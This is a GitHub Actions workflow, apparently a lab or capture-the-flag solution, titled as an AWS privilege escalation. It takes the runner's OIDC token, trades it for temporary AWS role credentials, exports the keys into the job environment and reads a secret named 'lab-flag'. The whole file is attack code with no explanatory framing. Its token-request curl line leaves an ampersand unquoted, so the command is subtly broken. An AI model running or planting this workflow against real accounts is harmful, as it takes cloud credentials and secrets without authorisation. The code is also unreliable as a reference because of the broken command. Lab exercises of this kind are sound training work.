name: AWS Privilege Escalation via OIDC

on:
  push:
    branches:
      - main

permissions:
  id-token: write  # Needed for OIDC authentication
  contents: read

jobs:
  escalate:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v3

      - name: Configure AWS CLI
        run: |
          sudo apt-get install -y awscli

      - name: Assume AWS Role
        id: assume-role
        env:
          AWS_ROLE_ARN: ${{ secrets.AWS_ROLE_ARN }}
        run: |
          CREDENTIALS=$(aws sts assume-role-with-web-identity \
            --role-arn "$AWS_ROLE_ARN" \
            --role-session-name "github-actions" \
            --web-identity-token $(curl -sL \
            $ACTIONS_ID_TOKEN_REQUEST_URL&audience=sts.amazonaws.com \
            -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" | jq -r '.value') \
            --duration-seconds 900)

          echo "AWS_ACCESS_KEY_ID=$(echo $CREDENTIALS | jq -r '.Credentials.AccessKeyId')" >> $GITHUB_ENV
          echo "AWS_SECRET_ACCESS_KEY=$(echo $CREDENTIALS | jq -r '.Credentials.SecretAccessKey')" >> $GITHUB_ENV
          echo "AWS_SESSION_TOKEN=$(echo $CREDENTIALS | jq -r '.Credentials.SessionToken')" >> $GITHUB_ENV

      - name: Retrieve Secret (Flag)
        run: |
          aws secretsmanager get-secret-value --secret-id lab-flag
